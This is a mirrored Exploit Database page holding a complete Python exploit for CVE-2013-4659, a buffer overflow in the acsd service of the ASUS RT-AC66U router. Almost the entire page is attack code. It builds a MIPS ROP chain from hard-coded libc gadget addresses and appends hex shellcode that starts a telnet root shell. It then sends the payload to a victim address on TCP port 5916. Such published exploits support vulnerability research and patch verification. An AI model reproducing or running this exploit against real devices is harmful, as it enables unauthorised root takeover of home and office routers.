ASUS RT-AC66U – ‘acsd’ Remote Command Execution

• Exploit Database
• 108 阅读

• 作者： Jacob Holcomb
  日期： 2013-07-27
• 类别：

  • remote
  平台：

  • linux_mips
• 来源：https://www.exploit-db.com/exploits/27133/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166

  #!/usr/bin/env python   import signal, struct from time import sleep from socket import * from sys import exit, exc_info   # # Title*******************ASUS RT-AC66U Remote Root Shell Exploit - acsd param command # Discovered and Reported*June 2013 # Discovered/Exploited By*Jacob Holcomb/Gimppy and Jacob Thompson #*Security Analsyts @ Independent Security Evaluators # Software Vendor*********http://asus.com # Exploit/Advisory********http://securityevaluators.com, http://infosec42.blogspot.com/ # Software****************acsd wireless service (Listens on TCP/5916) # Firmware Version********3.0.0.4.266 (Other versions were not tested and may be vulnerable) # CVE*********************ASUS RT-AC66U Multiple Buffer Overflows: CVE-2013-4659 # # Overview: # The ASUS RT-AC66U contains the Broadcom ACSD Wireless binary that is vulnerable to multiple # Buffer Overflow attacks. # # Multiple overflows exist in the following software: # # - Broadcom acsd - Wireless Channel Service (autochannel&param, autochannel&data, csscan&ifname commands) #     def sigHandle(signum, frm): # Signal handler   print "\n[!!!] Cleaning up the exploit... [!!!]\n" sleep(1) exit(0)     def targServer():   while True: try: server = inet_aton(raw_input("\n[*] Please enter the IPv4 address of the ASUS RT-AC66U router:\n\n>")) server = inet_ntoa(server) break except: print "\n\n[!!!] Error: Please enter a valid IPv4 address. [!!!]\n\n" sleep(1) continue   return server     def main():   print ("""\n [*] Title: ASUS RT-AC66U Remote Root Shell Exploit - acsd param command [*] Discovered and Reported: June 2013 [*] Discovered/Exploited By: Jacob Holcomb/Gimppy and Jacob Thompson, Security Analysts @ ISE [*] Software Vendor: http://asus.com [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/ [*] Software: acsd wireless service (Listens on TCP/5916) [*] Firmware Version: 3.0.0.4.266 (Other versions were not tested and may be vulnerable) [*] CVE: ASUS RT-AC66U Broadcom ACSD Buffer Overflow: CVE-2013-4659\n""") signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c victim = targServer() port = int(5916) acsdCmd = "autochannel&param=" #Vulnerable command - JH   # base address of .text section of libc.so.0 in acsd&apos;s address space libc_base = 0x2ab25000   # ROP gadget #1 # lui s0,0x2 # lia0,1 # movet9,s1 # jalrt9 # ori a1,s0,0x2 ra1 = struct.pack("<L", libc_base + 0x2d39c)   # ROP gadget #2 # movet9,s3 # lwra,44(sp) # lws4,40(sp) # lws3,36(sp) # lws2,32(sp) # lws1,28(sp) # lws0,24(sp) # jrt9 s1 = struct.pack("<L", libc_base + 0x34358)   # sleep() - used to force program context switch (cache flush) s3 = struct.pack("<L", libc_base + 0x2cb90)   # ROP gadget #3 # addiu a1,sp,24 # lwgp,16(sp) # lwra,32(sp) # jrra # addiu sp,sp,40 ra2 = struct.pack("<L", libc_base + 0xa1b0)   # ROP gadget #4 # movet9,a1 # addiu a0,a0,56 # jrt9 # movea1,a2 ra3 = struct.pack("<L", libc_base + 0x3167c)   # jalr sp jalr_sp ="\x09\xf8\xa0\x03"   JuNk = "\x42" * 510 safeNop = "2Aa3"   #80 Bytes system() Shellcode by Jacob Holcomb of ISE #Calling system() and executing telnetd -l /bin/sh shellcode = "\x6c\x6e\x08\x3c\x74\x65\x08\x35\xec\xff\xa8" shellcode += "\xaf\x64\x20\x09\x3c\x65\x74\x29\x35\xf0\xff" shellcode += "\xa9\xaf\x20\x2f\x0a\x3c\x2d\x6c\x4a\x35\xf4" shellcode += "\xff\xaa\xaf\x6e\x2f\x0b\x3c\x62\x69\x6b\x35" shellcode += "\xf8\xff\xab\xaf\x73\x68\x0c\x24\xfc\xff\xac" shellcode += "\xaf\xec\xff\xa4\x23\xec\xff\xbd\x23\xb4\x2a" shellcode += "\x19\x3c\x50\xf0\x39\x37\x09\xf8\x20\x03\x32" shellcode += "\x41\x61\x33"   sploit = acsdCmd + JuNk + s1 + JuNk[0:4] + s3 + ra1 + JuNk[0:48] sploit += ra2 + JuNk[0:24]+ jalr_sp + safeNop + ra3 + JuNk[0:4] sploit += safeNop + shellcode   try: print "\n [*] Creating network socket." net_sock = socket(AF_INET, SOCK_STREAM) except: print "\n [!!!] There was an error creating the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0)   try: print " [*] Connecting to ASUS RT-AC66U router @ %s on port TCP/%d." % (victim, port) net_sock.connect((victim, port)) except: print "\n [!!!] There was an error connecting to %s. [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0) try: print """ [*] Attempting to exploit the acsd param command. [*] Sending 1337 ro0t Sh3ll exploit to %s on TCP port %d. [*] Payload Length: %d bytes.""" % (victim, port, len(sploit)) net_sock.send(sploit) sleep(1) except: print "\n [!!!] There was an error sending the 1337 ro0t Sh3ll exploit to %s [!!!]\n\n%s\n" % (victim, exc_info()) sleep(1) exit(0)   try: print """ [*] 1337 ro0t Sh3ll exploit was sent! Fingers crossed for code execution! [*] Closing network socket. Press ctrl + c repeatedly to force exploit cleanup.\n""" net_sock.close() except: print "\n [!!!] There was an error closing the network socket. [!!!]\n\n%s\n" % exc_info() sleep(1) exit(0)     if __name__ == "__main__": main()